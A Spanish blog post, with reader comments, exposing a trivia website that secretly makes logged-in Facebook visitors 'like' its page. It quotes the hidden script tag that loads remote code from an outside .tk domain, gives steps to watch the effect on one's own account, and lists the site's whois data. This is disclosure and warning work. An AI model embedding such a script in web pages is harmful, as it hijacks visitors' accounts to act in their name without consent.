7

Auto likes en Facebook: cuidado con tu privacidad

Hace unos días empezaron a aparecer en mi muro de Facebook publicaciones de una página llamada El Rincón Abstracto. No le di mucha importancia y procedí a ocultar las publicaciones y quitar el “Me gusta” que no recordaba haber hecho en la página.

Hoy he visto que un conocido ha indicado que le gusta la página. Viendo que la temática no coincide con sus gustos, hemos estado hablando sobre el origen de dicho “Me gusta” y me ha mencionado que había visitado dicha página recientemente a través de un enlace enviado en Menéame. Procediendo a visitar dicho enlace, he encontrado la típica página que se dedica a publicar datos curiosos (que, irónicamente, avisa de que todo el contenido está disponible bajo licencia CC BY-SA cuando los propios artículos son copiados o refritos sin especificar la fuente, como se puede ver en estos ejemplos). Hasta ahí todo normal, salvo que al observar el código fuente he encontrado la siguiente sorpresa:

<!– Script AutoLike 1/2 (inicio) –>
<script src=’http://corner62000bana.tk/fb.php’ type=’text/javascript’></script>
<!– Script AutoLike 1/2 (fin) –>

Ni siquiera se molestan en ocultar la finalidad del script, que es ilegal según las condiciones de uso y de privacidad de Facebook (por cierto, si alguien quiere echarle un ojo a dicho código y en algún momento es retirado de la dirección anteriormente especificada, puede encontrar una copia aquí). Así que si tienes curiosidad por ver cómo actúa, sigue esta lista de pasos:

  1. Inicia sesión en Facebook en tu navegador preferido.
  2. Desactiva AdBlock o cualquier otro programa/extensión de bloqueo de scripts que puedas tener.
  3. Entra en http://www.rinconabstracto.com/.
  4. Ve a tu Registro de Actividad de Facebook y verás el siguiente cambio:

rinconabstracto_like

Por último, indicar que al hacer un whois al dominio devuelve los siguientes datos:

Domain Name: rinconabstracto.com
Creation Date: 17 Apr 2011 12:10:00
Registrar: eNom, Inc.
Registrant Name: WHOIS AGENT
Registrant Organization: WHOIS PRIVACY PROTECTION SERVICE, INC.
Registrant Street: PMB 368, 14150 NE 20TH ST – F1
Registrant Street: C/O RINCONABSTRACTO.COM
Registrant City: BELLEVUE
Registrant State/Province: WA
Registrant Postal Code: 98007
Registrant Country: US

No deja de ser gracioso que alguien que no duda en explotar agujeros de privacidad de los usuarios que visitan su sitio web ponga tanto celo en ocultar su identidad.

¿Algún abogado en la sala que quiera denunciar la infracción de la LOPD y la Ley de Cookies?

  1. […] Auto likes en Facebook: cuidado con tu privacidad […]

  2. ronaldo dice:

    A mi me pasó lo mismo con esta página. No le di importancia porque no presto mucha atención a Facebook. Sin embargo, al ver tu publicación he hecho lo que se merecen: les he quitado el like y he denuciado la página por SPAM. Creo que todos deberíamos hacer lo mismo: se lo merecen.

    • r2d2rigo dice:

      Sí, ya avisamos tanto a Meneame para que filtre los envíos de ese dominio como a Facebook de que están infringiendo los términos de uso. Esperemos que tomen cartas en el asunto y parcheen ese agujero del Facebook SDK.

  3. Emilio dice:

    Os agradezco mil esto, entro a Facebook de pascuas y ramos y un buen día me empezaron a salir cosas del rincon mierdero este, yo creía que eran posts patrocinados o algo. No recuerdo haberle dado jamás al like y menos haber entrado a ellos, aunque sí frecuento Meneame.

    Ya lo he quitado y denunciado por spam,

    Muchas gracias!

  4. Roberto dice:

    1. ¿Por qué no lo denuncias tú mismo a la AEPD? Ellos se encargarán de todo.
    2. Posteriormente, denúncialo a Facebook que se supone que también tomará medidas.

  5. yeah dice:

    La culpa no las tienen las cookies, es simplemente la privacidad, estan cogiendo tu usuario y ejecutando una acción en tu nombre. Es igual que si mandaran un email desde tu dirección de correo. Obviamente es denunciable y facebook ya podría poner algun sistema para que no se pueda hacer este tipo de cosas, como por ejemplo una confirmación necesaria del usuario antes de agregar el “me gusta”.

  6. Otra opción es dejar de votar en me gusta o en google + (todo lo que quieren es sacar información de nuestras preferencia para luego comerciar con nuestros gustos) y sacar ventajas competitivas